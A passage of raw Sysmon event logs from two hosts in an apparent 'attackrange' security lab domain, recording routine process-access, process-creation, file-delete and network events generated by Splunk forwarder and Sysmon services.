16:30:20.425{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061300Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:20.425{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061299Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:20.425{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061298Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:20.425{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061297Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:20.425{7F8C56E7-4E3A-6063-0500-00000000AF01}412528C:\Windows\system32\csrss.exe{7F8C56E7-521C-6063-2801-00000000AF01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061296Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:20.425{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-521C-6063-2801-00000000AF01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061295Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:20.427{7F8C56E7-521C-6063-2801-00000000AF01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000245989Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:20.941{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-521C-6063-B822-00000000AF01}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245988Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:20.941{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245987Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:20.941{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245986Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:20.941{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245985Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:20.941{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245984Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:20.941{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245983Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:20.941{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245982Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:20.941{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245981Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:20.941{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245980Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:20.941{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245979Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:20.941{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-521C-6063-B822-00000000AF01}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245978Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:20.941{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-521C-6063-B822-00000000AF01}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245977Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:20.942{CB4067E1-521C-6063-B822-00000000AF01}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245976Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:20.582{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E68BA25A0F01A300D63FB7CCC6B47794,SHA256=66E754FC8437739435BCA281CE56ADA8AE83A4426DC0B1ABC43FC991829CC487,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245975Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:18.687{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64791-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001061315Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:21.785{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=419423E1EB0E7DDC15522025242A2A38,SHA256=E2E99DF3BA153891B9900A4EC0532BB4441DB0A0881F06C055CEBA27325946D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061314Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:21.113{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-521D-6063-2901-00000000AF01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061313Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:21.113{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061312Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:21.113{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061311Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:21.113{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061310Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:21.113{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061309Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:21.113{7F8C56E7-4E3A-6063-0500-00000000AF01}412528C:\Windows\system32\csrss.exe{7F8C56E7-521D-6063-2901-00000000AF01}3752C:\Program 